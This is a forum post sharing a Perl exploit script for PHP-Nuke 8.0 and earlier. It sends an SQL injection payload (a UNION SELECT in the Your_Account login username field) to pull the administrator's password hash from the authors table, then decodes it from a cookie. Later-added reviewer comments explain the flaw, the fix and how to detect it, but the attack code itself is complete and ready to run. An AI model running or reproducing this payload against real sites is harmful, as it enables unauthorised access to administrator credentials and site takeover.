
01.04.2007, 09:42
Еще один сплойт))
Код:
#!/usr/bin/perl
# phpnuke <= 8.0, module: Your_Account
# This exploit allows to get admin's password
# need for work:
# magic_quotes off
# ------------------------------------------------
# coded by Kermil
# 24.10.2006
#
# Reviewer notes (defensive reading of this proof of concept):
# - Class of flaw: SQL injection through the `username` field of the
#   Your_Account login request. The value sent below closes a quoted string
#   and appends a UNION SELECT, which can only have an effect if the module
#   places the field into a SQL statement without escaping or bound
#   parameters.
# - The "magic_quotes off" precondition above means the only thing standing
#   between the request and the query was PHP's magic_quotes_gpc setting.
#   That setting was removed in PHP 5.4 and is not a security control; the
#   fix belongs in the query code (bound parameters, or the database
#   driver's own escaping function).
# - Data exposed: the `pwd` column of the `<prefix>_authors` table for the
#   chosen `aid`. The hash literal in the payload is the MD5 of "abc", the
#   same value sent as user_password; presumably the module compares an MD5
#   of the submitted password with the returned row, which would also mean
#   administrator passwords are stored as unsalted MD5 -- confirm against
#   the module source.
# - Detection: a POST to modules.php?name=Your_Account&op=login whose
#   `username` field contains a single quote, `/**/` and `UNION SELECT`.
#   POST bodies are normally absent from default access logs, so this needs
#   request-body logging or WAF/IDS inspection.
# - Response: if such requests appear in logs, treat every stored
#   administrator hash as disclosed and rotate those passwords after
#   patching.
# - The script runs without `use strict` / `use warnings`, and every
#   variable below is a package global.
use LWP::UserAgent;
use HTTP::Cookies;
use MIME::Base64;
# Three positional arguments are required; with fewer, usage() prints the
# help text and exits.
if ( @ARGV < 3 )
{
usage();
}
# Base URL of the installation, administrator name, and table prefix.
# None of the three is validated before being used below.
$path = $ARGV[0];
$username = $ARGV[1];
$prefix = $ARGV[2];
# HTTP client with a cookie jar attached, so cookies set by the server are
# kept by the client.
$xpl = LWP::UserAgent->new() or die;
$cookie_jar = HTTP::Cookies->new();
$xpl->cookie_jar( $cookie_jar );
# Every request carries the target's own base URL as Referer
# (presumably to satisfy a referer check in the application -- unverified).
$xpl->default_header('Referer' => $path );
# Login POST. `user_password` is a fixed value; `username` carries the
# injected SQL, with $prefix and $username interpolated into it as given on
# the command line.
$res = $xpl->post( $path.'modules.php?name=Your_Account&op=login',
Content => [
"user_password" => "abc",
"username" => "karamba'/**/UNION SELECT '900150983cd24fb0d6963f7d28e17f72',2,1,1,1,1,1,1,pwd,1 FROM ".$prefix."_authors WHERE aid='$username'/*",
]);
# The raw response body is written to stdout.
print $res->content;
# The rest of the script reads the `user` cookie from the jar,
# base64-decodes it and splits it on ':'. That the leaked column ends up in
# this cookie is implied by the code below, not shown by it.
$cookie_jar->extract_cookies( $response );
$cookie = $cookie_jar->as_string();
# NOTE(review): the match result is not checked before $1 is used.
$cookie =~ m/user=([^;]+)/;
$cookie = $1;
$decoded = decode_base64( $cookie );
@list = split( ':', $decoded );
$hash = "";
# Tenth colon-separated field of the decoded cookie.
$hash = $list[9];
# An undefined or empty field is reported as failure; anything else is
# printed as the recovered hash.
if ( $hash eq "" )
{
print "Exploit failed...";
}
else
{
print "Hash: ".$hash;
}
# Print the command-line help text and terminate the script.
# Takes no arguments and does not return: exit() is called once the text
# has been written to stdout.
sub usage()
{
    my @help_text = (
        " Usage: phpnukeGetAdminPassword.pl <path> <admin's name> <prefix>\r\n",
        " <path> - Path to phpnuke, e.g. http://phpnuke.com/\r\n",
        " <admin's name> - name of administrator, e.g. admin\r\n",
        " <prefix> - prefix of tables in database, e.g. nuke\r\n",
        "Coded by Kermil\r\n",
    );
    # Joined with an empty separator so the output matches five separate
    # print calls exactly.
    print join( '', @help_text );
    exit();
}